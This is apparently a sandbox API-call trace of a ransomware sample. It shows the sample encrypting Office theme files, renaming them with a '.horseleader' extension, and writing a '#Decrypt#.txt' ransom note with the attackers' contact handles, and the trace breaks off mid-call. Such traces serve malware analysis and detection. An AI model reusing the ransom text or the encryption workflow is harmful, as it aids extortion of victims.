1 [0247.392] lstrcmpW (lpString1="NETWORK.INF", lpString2="_uninstalling_.png") returned 1 [0247.392] lstrlenW (lpString=".testttjffg") returned 11 [0247.392] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF", lpSrch=".testttjffg") returned 0x0 [0247.392] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.392] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.394] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF") returned 79 [0247.394] StrStrW (lpFirst="NETWORK.INF", lpSrch=".txt") returned 0x0 [0247.394] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=585) returned 1 [0247.394] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x249, lpOverlapped=0x0) returned 1 [0247.410] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.411] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x249, lpOverlapped=0x0) returned 1 [0247.411] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.411] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.411] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.411] CloseHandle (hObject=0x1a4) returned 1 [0247.412] GetProcessHeap () returned 0x780000 [0247.412] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.412] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF.horseleader") returned 91 [0247.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\NETWORK.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\network.inf.horseleader")) returned 1 [0247.416] GetProcessHeap () returned 0x780000 [0247.416] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.416] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a6f8e30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x554, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.416] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.416] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 79 [0247.416] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.416] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.416] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.416] lstrlenW (lpString=".testttjffg") returned 11 [0247.416] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.416] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.417] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.417] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.417] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF") returned 79 [0247.417] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.417] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1364) returned 1 [0247.418] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x554, lpOverlapped=0x0) returned 1 [0247.425] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffaac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x554, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x554, lpOverlapped=0x0) returned 1 [0247.425] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.425] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.425] CloseHandle (hObject=0x1a4) returned 1 [0247.425] GetProcessHeap () returned 0x780000 [0247.425] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.426] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.horseleader") returned 91 [0247.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\preview.gif.horseleader")) returned 1 [0247.428] GetProcessHeap () returned 0x780000 [0247.428] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.428] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x2d35, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.428] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.429] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 80 [0247.429] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.429] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.429] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.429] lstrlenW (lpString=".testttjffg") returned 11 [0247.429] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.429] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.429] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.429] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.430] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG") returned 80 [0247.430] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.430] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=11573) returned 1 [0247.430] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x2d35, lpOverlapped=0x0) returned 1 [0247.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffd2cb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x2d35, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x2d35, lpOverlapped=0x0) returned 1 [0247.432] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.432] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.433] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.433] CloseHandle (hObject=0x1a4) returned 1 [0247.433] GetProcessHeap () returned 0x780000 [0247.433] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.433] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.horseleader") returned 92 [0247.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\thmbnail.png.horseleader")) returned 1 [0247.434] GetProcessHeap () returned 0x780000 [0247.434] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.434] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x2d35, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.434] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.434] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\#Decrypt#.txt") returned 81 [0247.435] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\network\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.435] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0247.435] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.436] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0247.437] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.437] CloseHandle (hObject=0x158) returned 1 [0247.437] GetProcessHeap () returned 0x780000 [0247.437] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.437] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PAPYRUS", cAlternateFileName="")) returned 1 [0247.437] lstrcmpiW (lpString1="PAPYRUS", lpString2="Windows") returned -1 [0247.437] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS") returned 67 [0247.437] lstrcmpW (lpString1="PAPYRUS", lpString2=".") returned 1 [0247.437] lstrcmpW (lpString1="PAPYRUS", lpString2="..") returned 1 [0247.437] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.437] GetProcessHeap () returned 0x780000 [0247.437] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.437] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*") returned 69 [0247.437] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.439] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.439] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\.") returned 69 [0247.439] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.439] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59c68c90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.440] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.440] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\..") returned 70 [0247.440] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.440] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0247.440] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x140f5c00, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x59c68c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x140f5c00, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x166d5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PAPYRUS.ELM", cAlternateFileName="")) returned 1 [0247.440] lstrcmpiW (lpString1="PAPYRUS.ELM", lpString2="Windows") returned -1 [0247.440] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM") returned 79 [0247.440] StrStrIW (lpFirst="PAPYRUS.ELM", lpSrch=".horseleader") returned 0x0 [0247.440] lstrcmpW (lpString1="PAPYRUS.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.440] lstrcmpW (lpString1="PAPYRUS.ELM", lpString2="_uninstalling_.png") returned 1 [0247.440] lstrlenW (lpString=".testttjffg") returned 11 [0247.440] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM", lpSrch=".testttjffg") returned 0x0 [0247.440] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.440] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.440] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\papyrus.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.441] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\PAPYRUS.ELM") returned 79 [0247.441] StrStrW (lpFirst="PAPYRUS.ELM", lpSrch=".txt") returned 0x0 [0247.441] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=91861) returned 1 [0247.441] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.441] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.444] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.444] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.445] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x8b6a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.445] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.445] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.445] WriteFile (in: 